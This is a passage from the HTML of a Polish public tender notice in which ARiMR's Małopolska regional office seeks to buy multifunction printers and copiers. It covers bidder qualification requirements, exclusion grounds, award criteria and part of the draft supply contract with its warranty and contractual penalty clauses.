a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał należycie co najmniej jedną dostawę urządzeń drukujących lub kopiujących o wartości:a)	W przypadku Zadania I (dostawa trzydziestu jeden urządzeń monochromatycznych) minimum 50 000 PLN brutto (dotyczy jednego kontraktu),b)	W przypadku Zadania II (dostawa trzech urządzeń kolorowych) minimum 20 000 PLN brutto (dotyczy jednego kontraktu)c)	W przypadku złożenia oferty na obydwa Zadania minimum 70 000 PLN brutto (dotyczy jednego kontraktu)</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">a) oświadczenia wykonawcy (wg. wzoru stanowiącego Załącznik nr 5 do SIWZ) o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tych należności lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;b) odpisu z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust.5 pkt.1 ustawy PZP.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1)	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej zamawiający będzie wymagał złożenia dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia (Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego dokumentów, o których mowa w pkt. 1, zamawiający dopuszcza złożenie przez wykonawcę innych dokumentów w celu potwierdzenia spełniania warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej wykonawcy),2)	W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej zamawiający będzie wymagał złożenia (sporządzonego wg. wzoru stanowiącego Załącznik nr 4 do SIWZ) wykazu dostaw wykonanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy (Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego dokumentów, o których mowa w pkt. 2 zamawiający może dopuścić złożenie przez wykonawcę innych odpowiednich dokumentów w celu potwierdzenia spełniania warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej).</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>długośc okresu gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>szybkość skanowania</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">UMOWA Nr .........................zawarta w dniu ............ 2017 r. w Krakowie pomiędzy:Agencją Restrukturyzacji i Modernizacji Rolnictwa z siedzibą w Warszawie przy Al. Jana Pawła II 70, 00-175 Warszawa, dalej "Zamawiającym", reprezentowaną przez:Adama Ślusarczyka - Dyrektora Małopolskiego Oddziału Regionalnego ARiMR,Danutę Grzybczyk - Kierownika Biura Finansowo-Księgowego Małopolskiego Oddziału Regionalnego ARiMRa............................................................................................................................................... z siedzibą w .................. i adresem ..................................................., wpisaną do Rejestru Przedsiębiorców pod numerem KRS......................, /wpisaną do Centralne Ewidencji i Informacji o Działalności Gospodarczej, zwanym/-ą w dalszej części Umowy ,,Wykonawcą"reprezentowanym przez:- .......................................................................................w wyniku wyboru oferty w postępowaniu o udzielenie zamówienia publicznego prowadzonym trybie przetargu nieograniczonego zgodnie z art. 39 i nast. Ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jednolity: Dz. U. z 2015, poz. 2164 ze zm.) zawarto umowę o następującej treści:§ 1DEFINICJEW niniejszej umowie następujące wyrażenia i określenia będą miały znaczenie zgodnie z podanymi poniżej definicjami:1.	Strony - Zamawiający i Wykonawca, wymienieni w preambule umowy.2.	Umowa - niniejsza Umowa wraz z załącznikami regulująca prawa i obowiązki Stron wynikające z niej i związane z jej wykonaniem3.	Sprzęt - urządzenia wielofunkcyjne o parametrach opisanych w załączniku nr 1 do Umowy 4.	Miejsce Dostawy - lokalizacje wskazane w Załączniku nr 2 do niniejszej umowy.5.	Dni Robocze - okres od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy.6.	Godziny robocze - godziny od 8.00-15.00 od poniedziałku do piątku w dni robocze.7.	Protokół Odbioru - dokument potwierdzający należyte wykonanie umowy lub jej części, stanowiący podstawę wystawienia faktury. § 2PRZEDMIOT UMOWY1.	Przedmiotem niniejszej umowy jest sprzedaż, dostarczenie oraz montaż i uruchomienie przez Wykonawcę Sprzętu w liczbie .... sztuk, zgodnego ze specyfikacją wynikającą z Załącznika Nr 1 do Umowy 2.	Sprzedaż, dostarczenie, wniesienie oraz montaż i uruchomienie Sprzętu przez Wykonawcę ma nastąpić do lokalizacji wskazanych przez Zamawiającego w Załączniku nr 2 do Umowy.3.	Sprzęt, który zobowiązuje się dostarczyć Wykonawca będzie fabrycznie nowy, bez śladów używania.4.	Prawa własności do Sprzętu przechodzą na Zamawiającego z datą podpisania bez zastrzeżeń Protokołów Odbioru.§ 3.WYMAGANIA DOTYCZĄCE SPRZEDAJĄCEGO1.	Wykonawca oświadcza, że posiada konieczne doświadczenie i profesjonalne kwalifikacje niezbędne do prawidłowego wykonania Umowy i zobowiązuje się do wykonania Umowy przy zachowaniu najwyższej staranności określonej w art. 355 § 2 Kodeksu Cywilnego.2.	Wykonawca nie ma prawa bez zgody Zamawiającego do zatrudniania przy wykonywaniu niniejszej Umowy w charakterze pracowników lub podwykonawców osób zatrudnionych u Zamawiającego, pod rygorem odstąpienia od Umowy i zapłaty kary umownej określonej w § 7 ust. 5. § 4.TERMINY DOSTAWY I ODBIORY1.	Wykonawca zobowiązuje się dostarczyć i uruchomić Sprzęt w Miejscu Dostawy w terminie ośmiu tygodni od dnia zawarcia Umowy. 2.	Dostawy Sprzętu odbywać się będą w Godzinach Roboczych na koszt i ryzyko Wykonawcy. 3.	Wykonawca dostarczy Sprzęt zgodnie z warunkami niniejszej Umowy i poniesie pełne ryzyko związane z niebezpieczeństwem jego przypadkowej utraty albo uszkodzenia do chwili dokonania ich odbioru.4.	Odbiór Sprzętu w Miejscu Dostawy będzie następować w formie Protokołu Odbioru podpisywanego każdorazowo po dokonanej dostawie przez przedstawicieli Zamawiającego i Wykonawcy.5.	W przypadku stwierdzenia, że dostarczony do Miejsca Dostawy Sprzęt:a.	jest niezgodny z zestawieniem ilościowym lub specyfikacją techniczną,b.	posiada ślady zewnętrznego uszkodzenia lub używania,- Zamawiający odmówi jego odbioru, zaznaczając w Protokole Odbioru powody odmowy odbioru od Wykonawcy i wyznaczy 3 dniowy termin na usunięcie wad lub dostarczenie sprzętu zgodnego z zestawieniem ilościowym i specyfikacja techniczną.6.	W przypadku zastrzeżeń Zamawiającego, dotyczących dostarczonego Sprzętu, innych niż określone w ust 5, Strony określą w Protokole Odbioru przyczyny odmowy odbioru wraz z określeniem terminu dostarczenia Sprzętu nowego, wolnego od wad i usterek.§ 5.GWARANCJA JAKOŚCI I RĘKOJMIA1.	Wykonawca gwarantuje, że dostarczony Sprzęt jest dobrej jakości oraz że spełnia wszystkie parametry określone w Załączniku Nr 1 do umowy.2.	W ramach udzielonej gwarancji Wykonawca zobowiązuje się do:a)	Udzielenia Zamawiającemu gwarancji na Sprzęt na okres wskazany w Załączniku nr 1 do Umowy; b)	Wykonywania ewentualnych bezpłatnych przeglądów Sprzętu;c)	Udzielenia Zamawiającemu 6 miesięcznej gwarancji na dostarczone tonery.d)	Zapewnienia pełnego serwisu gwarancyjnego.e)	Zapewnienia czasu reakcji serwisu gwarancyjnego w ciągu pięciu dni roboczych, licząc od chwili zgłoszenia. W przypadku, gdy w przeciągu kolejnych trzech Dni Roboczych od dnia zgłoszenia awarii Sprzętu, nie będzie możliwa naprawa, Wykonawca udostępni nieodpłatnie na czas naprawy sprzęt zastępczy o nie gorszych parametrach. Termin na dostarczenie sprzętu zastępczego wynosi 3 Dni Robocze. W opisanym przypadku okres trwania gwarancji uszkodzonego Sprzętu będzie wydłużony o czas trwania naprawy.f)	W przypadku trzykrotnej nieefektywnej naprawy Sprzętu składającego się na przedmiot umowy w okresie gwarancji, Kupującemu będzie przysługiwać nieodpłatna wymiana Sprzętu na nowy taki sam lub inny o nie gorszych parametrach.g)	dokonywania wszelkich napraw gwarancyjnych w lokalizacjach wskazanych w Załączniku nr 2 do umowy. h) wymiany wadliwych materiałów eksploatacyjnych, o których mowa w lit.c i dostarczenia oryginalnych materiałów eksploatacyjnych, fabrycznie nowych, wolnych od wad.3.	W zakresie nieuregulowanym niniejszą Umową obowiązywać będą ogólne warunki gwarancyjne producenta Sprzętu.4.	Wykonawca zobowiązuje się do przyjmowania zgłoszeń gwarancyjnych w Dni Robocze za pomocą:a)	faxu , nr faxu:................................................b)	e-maila, adres e-mail:....................................c)	poczty lub przekazanych osobiście przez przedstawiciela Zamawiającego.O każdej zmianie adresu e-maila lub numerów faksów Wykonawcy zobowiązany jest powiadomić Zamawiającego w formie pisemnej. Powiadomienie o powyższych zmianach nie stanowi zmiany Umowy wymagającej sporządzenia aneksu. 5.	Niezależnie od uprawnień z tytułu gwarancji Zamawiającemu przysługują wobec Wykonawcy uprawnienia z tytułu rękojmi.6.	Zamawiający zastrzega, iż z uwagi na konieczność stosowania przez niego przepisów dotyczących udzielania zamówień publicznych nie gwarantuje używania materiałów eksploatacyjnych pochodzących od producenta Sprzętu. Fakt stosowania materiałów innych niż pochodzące od producenta Sprzętu nie ma wpływu na zobowiązania gwarancyjne Wykonawcy.7.	Terminy rękojmi i gwarancji biegną od daty podpisania bez zastrzeżeń Protokołów Odbioru w Miejscu Dostawy.§ 6ODPOWIEDZIALNOŚĆ Z TYTUŁU WAD PRAWNYCH1.	Wykonawca gwarantuje ponadto, że dostarczony Sprzęt nie jest obciążony wadami prawnymi.2.	W przypadku wystąpienia wad prawnych, Zamawiającemu przysługuje prawo do odstąpienia od Umowy i żądania naprawienia poniesionej szkody. W przypadku wytoczenia przeciwko Zamawiającemu ewentualnego powództwa z powodu wad prawnych Sprzętu, Wykonawca zwróci Zamawiającemu poniesione koszty pomocy sądowej oraz poniesie konsekwencje finansowe zapadłego wyroku sądowego.§ 7KARY UMOWNE1.	W razie niewykonania przez Wykonawcę dostawy i uruchomienia Sprzętu w Miejscu Dostawy w terminie określonym w § 4 ust. 1 Wykonawca zobowiązany jest zapłacić Zamawiającemu karę umowną - w wysokości 0,1 % kwoty łącznego wynagrodzenia brutto określonego w § 8 ust. 1 za każdy dzień opóźnienia, niezależnie od jego przyczyn.2.	Jeżeli opóźnienie, o którym mowa w ust. 1, trwało będzie dłużej niż 5 Dni Roboczych, Zamawiający może, bez wyznaczenia dodatkowego terminu, odstąpić od Umowy, z zachowaniem prawa do naliczenia kwoty w wysokości 20% łącznego wynagrodzenia brutto określonego w § 8 ust. 1 lub zażądać zapłaty kwoty w wysokości 30 % kwoty łącznego wynagrodzenia brutto określonego w § 8 ust. 1.3.	W razie opóźnienia w terminie określonym w § 4 ust 5-6 na usunięcie wad Sprzętu stwierdzonych w trakcie odbioru, niezależnie od jego przyczyn ,Wykonawca zobowiązany jest zapłacić Zamawiającemu karę umowną w wysokości 0,3 % kwoty łącznego wynagrodzenia brutto określonego w § 8 ust. 1 za każdy dzień opóźnienia.4.	Jeżeli opóźnienie w usunięciu wad Sprzętu, o których mowa w § 4 ust 5-6, niezależnie od jego przyczyn, trwać będzie dłużej niż 5 Dni Roboczych, Zamawiający ma prawo odstąpić od umowy, bez konieczności wyznaczania dodatkowego terminu na usunięcie wad, z zachowaniem prawa do naliczenia kwoty w wysokości 20% łącznego wynagrodzenia brutto określonego w § 8 ust. 1, bądź według własnego wyboru dokonać zastępczego usunięcia wad na koszt Wykonawcy, bez utraty uprawnień z tytułu gwarancji i rękojmi.5.	W przypadku wystąpienia okoliczności wymienionej w §3 ust. 2 lub naruszenia § 5 ust 2 lit g-i Umowy Wykonawca jest zobowiązany do zapłaty na rzecz Zamawiającego kwoty w wysokości 10 % kwoty łącznego wynagrodzenia brutto określonego w § 